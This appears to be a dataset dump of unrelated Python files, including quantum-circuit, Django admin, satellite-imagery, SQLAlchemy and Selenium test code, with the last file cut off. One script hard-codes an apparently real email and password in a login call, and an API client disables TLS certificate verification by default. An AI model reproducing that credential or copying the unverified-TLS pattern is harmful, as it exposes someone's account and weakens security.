content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
|---|---|---|
from networkx.algorithms import bipartite
from qiskit import ClassicalRegister, QuantumRegister, QuantumCircuit
class BipartiteGraphState(QuantumCircuit):
def __init__(self, bipartite_graph):
super().__init__()
self.graph = bipartite_graph
# Create a quantum register based on the number of nodes
# in W + the number of nodes in B (= total number of nodes in G)
self.white_nodes, self.black_nodes = bipartite.sets(self.graph)
self.qreg = QuantumRegister(len(self.black_nodes) + len(self.white_nodes))
self.creg = ClassicalRegister(len(self.black_nodes) + len(self.white_nodes))
# Create a circuit using the quantum register
self.circuit = QuantumCircuit(self.qreg, self.creg)
# For each vertex in W, apply a Hadamard gate
for vertex in self.white_nodes:
self.circuit.h(vertex)
# For each vertex in B, apply a Hadamard gate
for vertex in self.black_nodes:
self.circuit.h(vertex)
# For each edge e={x,y} apply a controlled-Z gate on its vertices
for x, y in self.graph.edges:
self.circuit.cz(x, y)
self.node_dict = self.build_node_dict()
def build_node_dict(self):
"""
create a node dictionary from node to integer index of a qubit
in a Qiskit circuit
:param self:
"""
self.node_dict = dict()
for count, node in enumerate(self.graph.nodes):
self.node_dict[node] = count
def x_measurement(self, qubit, cbit):
"""Measure 'qubit' in the X-basis, and store the result in 'cbit'"""
self.circuit.h(qubit)
self.circuit.measure(qubit, cbit)
self.circuit.h(qubit)
def x_measure_white(self):
"""
measure the white qubits in the Pauli X-basis
:param self:
"""
self.circuit.barrier()
for vertex in self.black_nodes:
self.circuit.measure(vertex, vertex)
self.circuit.barrier()
for vertex in self.white_nodes:
self.x_measurement(vertex, vertex)
def x_measure_black(self):
"""
measure the black qubits in the Pauli X-basis
:param self:
"""
self.circuit.barrier()
for vertex in self.white_nodes:
self.circuit.measure(vertex, vertex)
self.circuit.barrier()
for vertex in self.black_nodes:
self.x_measurement(vertex, vertex)
def apply_stabilizer(self, node):
"""
applies the stabilizer generator corresponding to node
:param self:
:param node: a node in self.graph
"""
self.circuit.x(self.node_dict[node])
for neighbor in self.graph.neighbors(node):
self.circuit.z(self.node_dict[neighbor])
|
nilq/baby-python
|
python
|
# pylint: disable=no-name-in-module
from collections import deque
from typing import Deque
from pydantic import BaseModel
from ..core.constants import Interval
from .timeframe import TimeFrame
class Window(BaseModel):
"""Holds a sequence of timeframes and additional metadata."""
interval: Interval
timeframes: Deque[TimeFrame] = deque()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk
from gi.repository import Gdk
from gi.repository import GLib
# keyboard lib
from pynput.keyboard import Key, Listener, Controller
# capslock status
from capslock_status import status
# pop up time in ms
time = 700
# get capslock status
is_capslock_on = status.get_capslock_status()
# show caps-lock on pop up
# for given time
# then hide the window
def show_on():
# build interfaces
builder = Gtk.Builder()
builder.add_from_file("interfaces/on.glade")
window = builder.get_object("capslock-on")
return window
# show caps-lock off pop up
# for given time
# then hide the win
def show_off():
# build interfaces
builder = Gtk.Builder()
builder.add_from_file("interfaces/off.glade")
window = builder.get_object("capslock-off")
return window
# listen keyboard
keyboard = Controller()
# custom exception
class MyException(Exception):
pass
def on_press(key):
# define gloabal variable for pynput
global is_capslock_on
# exit keyboard listener
window = Gtk.Window()
if key == Key.esc:
raise MyException(key)
if key == Key.caps_lock:
if not is_capslock_on:
window = show_on()
is_capslock_on = True
else:
window = show_off()
is_capslock_on = False
# show window and kill
window.show_all()
GLib.timeout_add(time, window.hide);
# connect destroy event
window.connect("destroy", Gtk.main_quit)
# quit window after 1 ms
GLib.timeout_add(time, Gtk.main_quit)
Gtk.main()
# create keyboard listener
with Listener(on_press=on_press) as listener:
listener.join()
|
nilq/baby-python
|
python
|
from mix import save_color_image, brightness_limitization
import os
import shutil
from argparse import ArgumentParser
import json
from utils import change_datatype
from utils import timestamp_to_datetime
from utils import Bands
def parse_arguments():
parser = ArgumentParser(description='Create colored images and collect'
'into folder.',
epilog='python color_images.py ./downloads')
parser.add_argument('directory', help='directory for images.')
parser.add_argument('-c', '--collect', help='directory to collect images.',
default=None)
parser.add_argument('--collect-only', help="collect only",
action='store_true')
parser.add_argument('-b', '--bright-limit', type=int,
help='Supremum of chanel brightness.',
default=3500)
return parser.parse_args()
def color_images(directory, bright_limit=3500):
"""
Search tail folder in <directory> and create colored image
:param directory: str, directory, where to look
:param bright_limit: int, Supremum of chanel brightness.
"""
for root, dirs, files in os.walk(directory):
if len(dirs) == 0:
try:
product_dir = os.path.split(os.path.normpath(root))[0]
# open information about product
info = json.load(open(os.path.join(product_dir,
'info.json'), 'r'))
sentinel = info['Satellite']
if sentinel == 'Sentinel-2':
print('Coloring ' + root + '...')
save_color_image(root, Bands.RED, Bands.GREEN, Bands.BLUE,
'TCI1', bright_limit)
elif sentinel == 'Sentinel-1':
print('Changing DType to uint8 ' + root + '...')
for file in files:
if 'uint8' in file:
continue
new_file = os.path.splitext(file)[0] + '_uint8' + \
os.path.splitext(file)[1]
change_datatype(os.path.join(root, file),
os.path.join(root, new_file),
processor=lambda
x: brightness_limitization(x, 255))
print('\tuint8 file: ' + new_file)
else:
print('Unknown satellite')
except Exception as e:
print('Error: ' + 'Path: ' + root + '\n' + str(e))
def collect_images(search_directory, target='./colored'):
"""
Search colored images in <search_directory> and copy them
into target directory
:param search_directory: str, directory to search imaegs
:param target: str, directory to copy images
"""
for root, dirs, files in os.walk(search_directory):
for file in files:
if 'TCI1' in file or 'uint8' in file:
file_hint = ' '.join([os.path.splitext(file)[0]] +
os.path.normpath(root).split(os.sep)[-2:])
product_dir = os.path.split(os.path.normpath(root))[0]
# open information about product
info = json.load(open(os.path.join(product_dir,
'info.json'), 'r'))
sensing_start = timestamp_to_datetime(info['Sensing start'])
new_file = info['Satellite'] + \
' {:%Y-%m-%d %H:%M} '.format(sensing_start) + \
file_hint + '.tiff'
shutil.copy(os.path.join(root, file),
os.path.join(target, new_file))
if __name__ == '__main__':
args = parse_arguments()
if args.collect_only is False:
print('Coloring images in ' + args.directory)
color_images(args.directory, args.bright_limit)
if args.collect is not None:
print('Collecting files into ' + args.collect)
if os.path.isdir(args.collect) is False:
os.mkdir(args.collect)
collect_images(args.directory, args.collect)
|
nilq/baby-python
|
python
|
def deleteWhitespaces(inputStr):
nonWhitespaces = inputStr.split(' ')
return ''.join(nonWhitespaces)
|
nilq/baby-python
|
python
|
"""Graph implementation using adjacency lists."""
from __future__ import annotations
from dataclasses import dataclass, field
from typing import Any, Dict, Set, Optional, Union, Tuple
from collections.abc import Iterable
@dataclass
class Node:
"""This class can be used standalone or with a Graph
(if fast access to the list of all nodes is required)
"""
value: Any
# Maps edge to weight
adjacent: Dict[Node, int] = field(default_factory=dict)
def edge(self, other: Node, weight: int = 1, rev_weight: Optional[int] = None):
"""Don't forget to call Graph.add_node() if you are using a Graph class."""
self.adjacent[other] = weight
other.adjacent[self] = weight if rev_weight is None else rev_weight
def __hash__(self) -> int:
"""Every node is unique, we cannot have node equality."""
return id(self)
@dataclass
class Graph:
nodes: Set[Node] = field(default_factory=set)
@staticmethod
def _normalize_node(node: Any) -> Node:
if isinstance(node, Node):
return node
return Node(node)
def add_node(self, node: Any, adjacent: Iterable[Node] = ()) -> Node:
node = self._normalize_node(node)
self.nodes.add(node)
for adj_node in adjacent:
node.edge(adj_node)
return node
def add_node_weights(
self,
node: Any,
adjacent: Dict[Node, Union[int, Tuple[int, int]]] = (),
) -> Node:
node = self._normalize_node(node)
self.nodes.add(node)
for adj_node, weight in adjacent.items():
if isinstance(weight, tuple):
node.edge(adj_node, *weight)
else:
node.edge(adj_node, weight)
return node
|
nilq/baby-python
|
python
|
# encoding = utf-8
"""Wrapper for API calls to ExtraHop."""
# COPYRIGHT 2020 BY EXTRAHOP NETWORKS, INC.
#
# This file is subject to the terms and conditions defined in
# file 'LICENSE', which is part of this source code package.
# This file is part of an ExtraHop Supported Integration. Make NO MODIFICATIONS below this line
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class ExtraHopClient(object):
"""
ExtraHopClient is a simple wrapper around Requests.Session to save authentication and
connection data.
"""
def __init__(self, host, api_key, verify_certs=False):
self.host = host
self.session = requests.Session()
self.session.headers = {
"Accept": "application/json",
"Authorization": f"ExtraHop apikey={api_key}",
}
self.session.verify = verify_certs
def get(self, path):
"""Send GET request to ExtraHop API."""
return self._api_request("get", path)
def post(self, path, data=None, json=None):
"""Send POST request to ExtraHop API."""
return self._api_request("post", path, data, json)
def patch(self, path, data=None, json=None):
return self._api_request("patch", path, data, json)
def delete(self, path):
return self._api_request("delete", path)
def _api_request(self, method, path, data=None, json=None):
"""Handle API requests to ExtraHop API."""
url = f"https://{self.host}/api/v1/{path}"
if method == "get":
rsp = self.session.get(url)
elif method == "post":
rsp = self.session.post(url, data=data, json=json)
elif method == "patch":
rsp = self.session.patch(url, data=data, json=json)
elif method == "delete":
rsp = self.session.delete(url)
else:
raise ValueError("Unsupported HTTP method {}".format(method))
rsp.raise_for_status()
return rsp
|
nilq/baby-python
|
python
|
from distutils.core import setup
DESCRIPTION = ('Python interface to the Refinitiv Datastream (former Thomson '
'Reuters Datastream) API via Datastream Web Services (DSWS)')
# Long description to be published in PyPi
LONG_DESCRIPTION = """
**PyDatastream** is a Python interface to the Refinitiv Datastream (former Thomson
Reuters Datastream) API via Datastream Web Services (DSWS) (non free),
with some convenience functions. This package requires valid credentials for this
API.
For the documentation please refer to README.md inside the package or on the
GitHub (https://github.com/vfilimonov/pydatastream/blob/master/README.md).
"""
_URL = 'http://github.com/vfilimonov/pydatastream'
__version__ = __author__ = __email__ = None # will be extracted from _version.py
exec(open('pydatastream/_version.py').read()) # defines __version__ pylint: disable=W0122
setup(name='PyDatastream',
version=__version__,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
url=_URL,
download_url=_URL + '/archive/v' + __version__ + '.zip',
author=__author__,
author_email=__email__,
license='MIT License',
packages=['pydatastream'],
install_requires=['requests'],
extras_require={
'pandas': ['pandas'],
},
classifiers=['Programming Language :: Python :: 3'],
)
|
nilq/baby-python
|
python
|
from django.conf import settings
from django.contrib import admin
from django.template.response import TemplateResponse
from django.urls import path, resolve, reverse
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.views.generic import View
from constance import config
class AdminBaseContextMixin:
def get_context_data(self, **kwargs):
context = super().get_context_data(title=self._admin_title, **kwargs)
context.update(admin.site.each_context(self.request))
return context
class CrazyArmsAdminSite(admin.AdminSite):
AdminBaseContextMixin = AdminBaseContextMixin
index_title = ""
empty_value_display = mark_safe("<em>none</em>")
site_url = None
nginx_proxy_views = (("View server logs", "/logs/", "common.view_logs"),)
if settings.ZOOM_ENABLED:
nginx_proxy_views += (("Administer Zoom over VNC", "/zoom/vnc/", "common.view_websockify"),)
if settings.HARBOR_TELNET_WEB_ENABLED:
nginx_proxy_views += (
(
"Liquidsoap harbor telnet (experimental)",
"/telnet/",
"common.view_telnet",
),
)
@property
def site_title(self):
return format_html("{} — Station Admin", config.STATION_NAME)
site_header = site_title
def __init__(self, *args, **kwargs):
self.extra_urls = []
super().__init__(*args, **kwargs)
def app_index_extra(self, request):
return TemplateResponse(
request,
self.index_template or "admin/app_index_extra.html",
{
**self.each_context(request),
"title": "Miscellaneous Configuration administration",
"app_list": False,
},
)
def app_index(self, request, app_label, extra_context=None):
return super().app_index(
request,
app_label,
extra_context={**(extra_context or {}), "extra_urls": []},
)
def each_context(self, request):
context = super().each_context(request)
current_url_name = resolve(request.path_info).url_name
is_extra_url = False
extra_urls = []
# Registered views
for title, pattern, permission in self.extra_urls:
if permission is None or request.user.has_perm(permission):
extra_urls.append((title, reverse(f"admin:{pattern.name}"), False))
if current_url_name == pattern.name:
is_extra_url = True
for title, url, permission in self.nginx_proxy_views:
if request.user.has_perm(permission):
extra_urls.append((title, url, True))
context.update(
{
"current_url_name": current_url_name,
"extra_urls": sorted(extra_urls),
"is_extra_url": is_extra_url,
}
)
return context
def register_view(self, route, title, kwargs=None, name=None):
if name is None:
name = route.replace("/", "").replace("-", "_")
def register(cls_or_func):
cls_or_func._admin_title = title
view = self.admin_view(cls_or_func.as_view() if issubclass(cls_or_func, View) else cls_or_func)
pattern = path(
route=f"settings/{route}",
view=self.admin_view(view),
kwargs=kwargs,
name=name,
)
permission = getattr(cls_or_func, "permission_required", None)
self.extra_urls.append((title, pattern, permission))
return cls_or_func
return register
def get_urls(self):
return (
[
path(
"settings/",
view=self.admin_view(self.app_index_extra),
name="app_index_extra",
)
]
+ [pattern for _, pattern, _ in self.extra_urls]
+ super().get_urls()
)
|
nilq/baby-python
|
python
|
from robo_navegador import *
from dados_ritmistas import ler_dados
from alterar_docs import *
nomes = ('Matheus Delaqua Rocha De Jesus',
'Cecília')
if __name__ == '__main__':
renomear(nome_atual_pasta='Credenciamento TABU (File responses)')
mover(path=('Arquivo do Documento (File responses)', 'Comprovante de Matrícula (File responses)'))
site = Navegador()
site.logar('amandaturno@usp.br', 'asequith')
lista = ler_dados()
for pessoa in lista:
if not (pessoa.arquivo_doc or pessoa.comprovante) == 'Arquivo não encontrado\n':
if pessoa.nome not in nomes:
site.cadastrar_ritmista(pessoa)
sleep(5)
else:
print(f'\033[1;7;30mPulando {pessoa.nome}...\033[m')
print(f'\033[1;7;30mPrograma finalizado, {site.contador} ritmistas cadastrados\033[m')
|
nilq/baby-python
|
python
|
import argparse
from pathlib import Path
from event_types import event_types
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=(
'Train event classes models.'
'Results are saved in the models directory.'
)
)
args = parser.parse_args()
n_types = 3
start_from_DL2 = False
if start_from_DL2:
# Prod3b
# dl2_file_name = (
# '/lustre/fs21/group/cta/users/maierg/analysis/AnalysisData/uploadDL2/'
# 'Paranal_20deg/gamma_onSource.S.3HB9-FD_ID0.eff-0.root'
# )
# Prod5
dl2_file_name = (
'/lustre/fs22/group/cta/users/maierg/analysis/AnalysisData/'
'prod5-Paranal-20deg-sq08-LL/EffectiveAreas/'
'EffectiveArea-50h-ID0-NIM2LST2MST2SST2SCMST2-g20210921-V3/BDT.DL2.50h-V3.g20210921/'
'gamma_onSource.S.BL-4LSTs25MSTs70SSTs-MSTF_ID0.eff-0.root'
)
dtf = event_types.extract_df_from_dl2(dl2_file_name)
else:
dtf = event_types.load_dtf()
dtf_e = event_types.bin_data_in_energy(dtf)
labels, train_features = event_types.nominal_labels_train_features()
dtf_e = event_types.add_event_types_column(dtf_e, labels)
dtf_e_train, dtf_e_test = event_types.split_data_train_test(dtf_e)
all_models = event_types.define_classifiers()
selected_models = [
'MLP_classifier',
# 'MLP_relu_classifier',
# 'MLP_logistic_classifier',
# 'MLP_uniform_classifier',
# 'BDT_classifier',
# 'random_forest_classifier',
# 'ridge_classifier',
# # 'ridgeCV_classifier', # unnecessary, same as the ridge classifier
# 'SVC_classifier', # Fails to evaluate for some reason, all SVC based fail
# 'SGD_classifier',
# 'Gaussian_process_classifier', # Takes forever to train
# 'bagging_svc_classifier', # Fails to evaluate for some reason, all SVC based fail
# 'bagging_dt_classifier',
# 'oneVsRest_classifier', # Fails to evaluate for some reason
# 'gradient_boosting_classifier',
]
models_to_train = dict()
for this_model in selected_models:
this_model_name = '{}_ntypes_{:d}'.format(this_model, n_types)
models_to_train[this_model_name] = dict()
models_to_train[this_model_name]['train_features'] = train_features
models_to_train[this_model_name]['labels'] = 'event_type_{:d}'.format(n_types)
models_to_train[this_model_name]['model'] = all_models[this_model]
models_to_train[this_model_name]['test_data_suffix'] = 'classification'
trained_models = event_types.train_models(
dtf_e_train,
models_to_train
)
event_types.save_models(trained_models)
event_types.save_test_dtf(dtf_e_test, 'classification')
|
nilq/baby-python
|
python
|
#-*- coding: utf-8 -*-
#!/usr/bin/python3
"""
Copyright (c) 2020 LG Electronics Inc.
SPDX-License-Identifier: MIT
"""
import argparse
import copy
import logging
import os
import sys
import textwrap
from .tool_wrapper import get_tool_list, get_tool_wrapper, load_tools
from .context import WrapperContext
from .report import Report
from texttable import Texttable
LOGGER = logging.getLogger('SAGE')
def run_tools(ctx):
for toolname in get_tool_list():
option = ctx.get_tool(toolname)
if option is not None:
wrapper = get_tool_wrapper(toolname)(toolname, option)
if wrapper.get_tool_path(ctx) is None:
LOGGER.warning("* %s is not installed!!!", toolname)
continue
LOGGER.info("* %s is running...", toolname)
wrapper.run(ctx)
run_tools.__annotations__ = {'ctx': WrapperContext}
def generate_report(ctx, args_dict):
report = Report(ctx, args_dict)
table = Texttable(max_width=0)
table.set_deco(Texttable.HEADER | Texttable.BORDER | Texttable.VLINES)
table.add_rows(report.get_summary_table())
print(table.draw())
if ctx.output_path:
report.write_to_file(os.path.join(ctx.output_path, "sage_report.json"))
generate_report.__annotations__ = {'ctx': WrapperContext, 'args_dict': dict}
def main():
parser = argparse.ArgumentParser(
description="Static Analysis Group Execution",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("--source-path", help="source path")
parser.add_argument("--build-path", help="build path")
parser.add_argument(
"--tool-path", help="if this option is specified, only tools in this path is executed")
parser.add_argument("--output-path", help="output path")
parser.add_argument("--exclude-path", help="exclude path")
parser.add_argument("--target-triple", help="compile target triple")
parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
parser.add_argument(
"tools", nargs="*", help=textwrap.dedent("""\
List of tools.
Tool-specific command-line options separated by colons can be added after the tool name.
ex) 'cppcheck:--library=googletest'"""),
default=["cppcheck", "cpplint", "duplo", "metrix++"])
args = parser.parse_args()
args_dict = copy.deepcopy(vars(args))
default_exclude_path = " .git"
if args.exclude_path:
args.exclude_path += default_exclude_path
else:
args.exclude_path = default_exclude_path
log_level = logging.DEBUG if args.verbose else logging.WARNING
logging.basicConfig(stream=sys.stdout, level=log_level)
# load wrapper
LOGGER.info("load wrapper")
load_tools()
# make WrapperContext
ctx = WrapperContext(
args.tools, args.source_path, args.build_path, args.tool_path,
args.output_path, args.target_triple, args.exclude_path)
if not ctx.proj_file_exists():
LOGGER.error("There is no 'compile_commands.json'")
LOGGER.info("run tools")
run_tools(ctx)
# generate report
LOGGER.info("reporting")
generate_report(ctx, args_dict)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
from sqlalchemy import (
create_engine as create_engine,
MetaData, Table,
Column, Integer, Sequence,
String, ForeignKey, DateTime,
select, delete, insert, update, func
)
from sqlalchemy.sql import and_
from tornado import concurrent, ioloop
import datetime
import tornado
import sqlite3
#from concurrent.futures import ThreadPoolExecutor
metadata = MetaData()
tables = {
'servers': Table('servers', metadata,
Column('id', Integer(), Sequence('servers_id_seq'), primary_key=True, index=True),
Column('name', String(20), nullable=False, unique=True, index=True),
Column('address', String(16), nullable=False),
Column('port', String(10), nullable=False)),
'servers_logs': Table('servers_logs', metadata,
Column('id', Integer(), Sequence('servers_logs_id_seq'), primary_key=True, index=True),
Column('server_id', Integer(), nullable=False, index=True),
Column('time', DateTime, nullable=False),
Column('text', String(1024), nullable=False)),
'users': Table('users', metadata,
Column('id', Integer(), Sequence('users_id_seq'), primary_key=True, index=True)),
'servers_events': Table('servers_events', metadata,
Column('id', Integer(), Sequence('servers_events_seq'), primary_key=True, index=True),
Column('user_id', Integer(), nullable=False, index=True),
Column('server_id', Integer(), nullable=False, index=True),
Column('text', String(1024), nullable=False)),
'events_occured': Table('events_occured', metadata,
Column('event_id', Integer(), index=True),
Column('log_id', Integer(), index=True))
}
class DBHandler():
#executor = ThreadPoolExecutor(max_workers=4)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.io_loop = ioloop.IOLoop.current()
self.engine = create_engine('sqlite:///database.db')
self.conn = self.engine.connect()
def shutdb(self):
self.conn.close();
self.io_loop = None
self.engine = None
self.conn = None
#sqlite object cant be used in different threads, so i disabled this feature
#temporarily.
#@concurrent.run_on_executor
def execute(self, query, *args):
return self.conn.execute(query)
def init_db():
'''
Fill db with initial environment.
'''
#engine = create_engine('postgresql://idfumg:qwerty@localhost/logmonitor_db')
engine = create_engine('sqlite:///database.db')
metadata.create_all(engine)
conn = engine.connect()
transaction = conn.begin()
conn.execute(delete(tables['servers_logs']))
conn.execute(delete(tables['servers']))
conn.execute(delete(tables['servers_events']))
conn.execute(delete(tables['users']))
conn.execute(delete(tables['events_occured']))
now = datetime.datetime.now()
servers = [
{'name': 'ГРТ', 'address': '192.168.1.1', 'port': '67890'},
{'name': 'ГРС', 'address': '192.168.1.2', 'port': '54321'},
{'name': 'TST', 'address': '192.168.1.3', 'port': '12345'}
]
conn.execute(insert(tables['servers']), servers)
servers_logs = []
for i in range(1000):
servers_logs.append({'server_id': 1, 'time': now, 'text': 'HTTPSRV МОВАПУ Warning! Unexpected behaviour! ' + str(i)})
for i in range(500):
servers_logs.append({'server_id': 1, 'time': now, 'text': 'search test ' + str(i)})
# for i in range(500):
# servers_logs.append({'name': 'ГРТ', 'time': now - datetime.timedelta(days=i), 'text': 'search test ' + str(i)})
grs_servers_logs = []
for i in range(10):
grs_servers_logs.append({'server_id': 2, 'time': now + datetime.timedelta(days=1), 'text': 'HTTPSRV МОВАПУ Warning! my own unexpected error! ' + str(i)})
events = [
{'user_id': 1, 'text': 'unexpected', 'server_id': 1},
{'user_id': 1, 'text': 'httpsrv', 'server_id': 1},
{'user_id': 1, 'text': 'error', 'server_id': 2},
]
conn.execute(insert(tables['servers_logs']), servers_logs)
conn.execute(insert(tables['servers_logs']), grs_servers_logs)
conn.execute(insert(tables['servers_events']), events)
print('database filled')
cursor = conn.execute(select([tables['servers']]))
servers = [server[1] for server in cursor]
transaction.commit()
conn.close()
return servers
|
nilq/baby-python
|
python
|
inp = open("input/day6.txt", "r")
prvotne_ribe = [int(x) for x in inp.readline().split(",")]
inp.close()
prvotna_populacija = [0 for _ in range(9)]
for riba in prvotne_ribe:
prvotna_populacija[riba] += 1
def zivljenje(N):
populacija = prvotna_populacija
for _ in range(N):
nova_populacija = [0 for _ in range(9)]
for k in range(9):
if k == 0:
nova_populacija[8] += populacija[k]
nova_populacija[6] += populacija[k]
else:
nova_populacija[k-1] += populacija[k]
populacija = nova_populacija
return sum(populacija)
# --------------------------
print("1. del: ")
print(zivljenje(80))
print("2. del: ")
print(zivljenje(256))
|
nilq/baby-python
|
python
|
import sys
import pandas as pd
import matplotlib.pyplot as plt
def main():
dfpath = 'nr_dataframes/final.pkl'
df = pd.read_pickle(dfpath)
df.hist(column='length', bins=100)
df = df[df[show] > 400]
plt.show()
if __name__=="__main__":
show = sys.argv[1]
main()
|
nilq/baby-python
|
python
|
from selenium import webdriver
import datetime
from . import helper
class NewVisitorTest(helper.FunctionalTestBase):
def setUp(self):
self.browser = webdriver.Firefox()
self.data = {
"dhuha": "4",
"tilawah_from": "1",
"tilawah_to": "20",
"ql": "5",
"shaum": "Iya",
"date": datetime.datetime.now().strftime("%Y-%m-%d")
}
def tearDown(self):
self.delete_item_by_date(self.data["date"])
self.logout()
self.browser.quit()
#region helper methods
def assert_data_saved_correctly(self):
dhuha_display = self.browser.find_element_by_xpath("//table[@id='table-mutaaba3ah-item']/tbody/tr[td='Dhuha']/td[2]")
self.assertIn(self.data["dhuha"], dhuha_display.text)
ql_display = self.browser.find_element_by_xpath("//table[@id='table-mutaaba3ah-item']/tbody/tr[td='Qiyamul Lail']/td[2]")
self.assertIn(self.data["ql"], ql_display.text)
shaum_display = self.browser.find_element_by_xpath("//table[@id='table-mutaaba3ah-item']/tbody/tr[td='Shaum']/td[2]")
self.assertIn(self.data["shaum"], shaum_display.text)
tilawah_display = self.browser.find_element_by_xpath("//table[@id='table-mutaaba3ah-item']/tbody/tr[td='Tilawah']/td[2]")
self.assertIn(self.data["tilawah_from"], tilawah_display.text)
self.assertIn(self.data["tilawah_to"], tilawah_display.text)
#endregion
def login_entrydata_searchreport_logout(self):
# Brian mendapat informasi dari grup WA ttg aplikasi mutaba'ah harian online
# Dia mencoba mengakses halaman depan (home) aplikasi tersebut
self.browser.get("http://localhost:8000")
self.try_logout()
# Brian melihat tidak ada menu apa2 kecuali link untuk login
self.assertEquals(len(self.browser.find_elements_by_id("user-email")), 0)
self.assertEquals(len(self.browser.find_elements_by_id("logout")), 0)
self.assertEquals(len(self.browser.find_elements_by_id("menu-entry")), 0)
self.assertEquals(len(self.browser.find_elements_by_id("menu-report")), 0)
self.login()
# Setelah login, Brian melihat ada menu ke halaman 'Entry' dan 'Report'
self.assertEquals(len(self.browser.find_elements_by_id("menu-entry")), 1)
self.assertEquals(len(self.browser.find_elements_by_id("menu-report")), 1)
# Brian membuka halaman 'Report' untuk memastikan tidak ada data apa2
# karena ini adalah pertama kalinya ia mengakses aplikasi mutaba'ah ini
self.navigate_to_report()
report_items = self.find_report_items_by_date()
self.assertEquals(len(report_items), 0)
# Brian kemudian membuka halaman 'Entry',
# dan mengisikan data mutaba'ah untuk tgl hari ini
self.navigate_to_entry()
self.create_or_edit_data(self.data)
# Setelah disubmit, Brian melihat halaman konfirmasi menunjukkan data
# sesuai dg yg sudah diisi sebelumnya
self.assert_data_saved_correctly()
# error: AssertionError: u"4 raka'at" != '4'
# Brian beralih ke halaman 'Report' utk memastikan data yg baru saja
# disubmit, muncul di halaman 'Report'
self.navigate_to_report()
report_items = self.find_report_items_by_date(self.data["date"])
self.assertEquals(len(report_items), 1)
report_item = report_items[0]
# Brian menyadari ada inputan yg salah
# Brian kemudian mengupdate data Dhuha dg angka yang benar
self.data["dhuha"] = "6"
report_item.click()
btn_edit = self.browser.find_element_by_id("edit")
btn_edit.click()
self.browser.switch_to.window(self.browser.window_handles[1])
self.create_or_edit_data(self.data)
# Setelah disubmit, Brian melihat halaman konfirmasi menunjukkan data
# sesuai update terakhir
# kemudian Brian menutup halaman konfirmasi tsb
self.assert_data_saved_correctly()
self.browser.close()
self.browser.switch_to.window(self.browser.window_handles[0])
|
nilq/baby-python
|
python
|
# Generated by Django 2.0.6 on 2018-06-14 08:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('course', '0007_auto_20180613_2156'),
('voting', '0005_auto_20180613_2201'),
]
operations = [
migrations.CreateModel(
name='UserTaggingCourse',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tag_date', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('tag_course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='course_tags', to='course.Course', verbose_name='Tagging course')),
('tagger', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Course Tagger')),
('tags', models.ManyToManyField(to='voting.Tags', verbose_name="User's tag(s) for this course")),
],
options={
'verbose_name_plural': 'User Reviews',
'verbose_name': 'User Review',
},
),
]
|
nilq/baby-python
|
python
|
# Generated by Django 3.2.9 on 2021-11-24 15:56
from django.db import migrations
EVENT_TYPES = (
(1, "CREATED", "Created the resourcing request"),
(2, "UPDATED", "Updated the resourcing request"),
(3, "SENT_FOR_APPROVAL", "Sent the resourcing request for approval"),
(4, "AMENDING", "Amending the resourcing request"),
(5, "SENT_FOR_REVIEW", "Sent the amendments for review"),
(6, "REVIEWED_AMENDMENTS", "Reviewed the amendments"),
(7, "GROUP_APPROVED", "A group approved the resourcing request"),
(8, "GROUP_REJECTED", "A group rejected the resourcing request"),
(9, "COMMENTED", "Somebody commented on the resourcing request"),
(10, "APPROVED", "The resourcing request was approved"),
)
def insert_event_types(apps, schema_editor):
EventType = apps.get_model("event_log", "EventType")
for pk, code, name in EVENT_TYPES:
EventType.objects.create(pk=pk, code=code, name=name)
def delete_event_types(apps, schema_editor):
EventType = apps.get_model("event_log", "EventType")
EventType.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
("main", "0027_auto_20211123_1605"),
("event_log", "0001_initial"),
]
operations = [migrations.RunPython(insert_event_types, delete_event_types)]
|
nilq/baby-python
|
python
|
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
from ckeditor_uploader.fields import RichTextUploadingField
# Create your models here.
class RemoteProfile(models.Model):
host = models.URLField(max_length=200)
api_key = models.CharField(max_length=128)
def __str__(self):
return self.host
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField()
api_key = models.CharField(max_length=128, unique=True)
remote_profiles = models.ManyToManyField(RemoteProfile)
def __str__(self):
return self.user.__str__()
class Tag(models.Model):
name = models.CharField(max_length=128, blank=False, unique=True)
def __str__(self):
return self.name
class Post(models.Model):
slug = models.SlugField(max_length=200, unique=True)
title = models.CharField(max_length=256)
content = RichTextUploadingField(blank=True)
password = models.CharField(max_length=64, blank=True)
image = models.ImageField(upload_to='img/', default=None)
date_posted = models.DateTimeField(default=timezone.now)
author = models.ForeignKey(User, on_delete=models.CASCADE)
tags = models.ManyToManyField(Tag, blank=True)
published = models.BooleanField(default=False)
def __str__(self):
return self.title
class Page(models.Model):
slug = models.SlugField(max_length=200, unique=True)
order = models.IntegerField(default=0)
link_title = models.CharField(max_length=32)
content = RichTextUploadingField(blank=True)
published = models.BooleanField(default=False)
LOCATION_CHOICES = [
('NAV', 'Navbar'),
('SIDE', 'Sidebar'),
('FOOT', 'Footer'),
]
location = models.CharField(max_length=4, choices=LOCATION_CHOICES, default='NAV')
def __str__(self):
return self.link_title
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# $Id: mailtrim.py,v 1.1 2002/05/31 04:57:44 msoulier Exp $
"""The purpose of this script is to trim a standard Unix mbox file. If the
main function is called, it expects two parameters in argv. The first is the
number of most recent messages to keep. The second is the path to the mbox
file."""
import sys, string, os
from tempfile import mktemp
from shutil import copyfile
error = sys.stderr.write
def count_messages(file):
